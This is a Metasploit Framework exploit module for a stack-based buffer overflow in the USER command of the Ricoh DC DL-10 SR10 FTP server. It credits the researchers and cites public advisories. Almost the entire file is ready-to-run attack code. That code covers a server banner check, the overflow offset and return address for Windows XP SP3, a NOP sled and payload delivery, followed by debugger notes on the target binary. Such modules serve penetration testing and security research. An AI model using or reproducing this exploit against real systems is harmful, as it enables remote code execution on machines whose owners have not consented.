##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info={})
super(update_info(info,
'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
service. By supplying a long string of data to the USER command, it is
possible to trigger a stack-based buffer overflow, which allows remote code
execution under the context of the user.
Please note that in order to trigger the vulnerability, the server must
be configured with a log file name (by default, it's disabled).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julien Ahrens', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '79691'],
['URL', 'http://secunia.com/advisories/47912'],
['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
],
'Payload' =>
{
# Yup, no badchars
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3',
{
'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)
'Offset' => 245
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 1 2012",
'DefaultTarget' => 0))
# We're triggering the bug via the USER command, no point to have user/pass
# as configurable options.
deregister_options('FTPPASS', 'FTPUSER')
end
def check
connect
disconnect
if banner =~ /220 DSC ftpd 1\.0 FTP Server/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
buf = ''
buf << rand_text_alpha(target['Offset'], payload_badchars)
buf << [target.ret].pack('V')
buf << make_nops(20)
buf << payload.encoded
print_status("#{rhost}:#{rport} - Sending #{self.name}")
connect
send_user(buf)
handler
disconnect
end
end
=begin
0:002> lmv m SR10
start end module name
00400000 00410000 SR10 (deferred)
Image path: C:\Program Files\DC Software\SR10.exe
Image name: SR10.exe
Timestamp: Mon May 19 23:55:32 2008 (483275E4)
CheckSum: 00000000
ImageSize: 00010000
File version: 1.0.0.520
Product version: 1.0.0.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Ricoh Co.,Ltd.
ProductName: SR-10
InternalName: SR-10
OriginalFilename: SR10.EXE
ProductVersion: 1, 0, 0, 0
FileVersion: 1, 0, 0, 520
PrivateBuild: 1, 0, 0, 520
SpecialBuild: 1, 0, 0, 520
FileDescription: SR-10
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=end